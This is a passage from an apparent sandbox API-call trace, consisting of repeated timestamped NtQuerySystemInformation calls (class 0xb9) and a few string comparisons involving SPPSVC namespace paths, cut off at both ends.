ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0284.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x40, ResultLength=0x0) [0284.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0284.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0284.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0284.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0284.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0284.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0284.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.804] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0284.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0284.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0284.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.828] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0284.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0284.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0284.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.841] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0284.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0284.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, 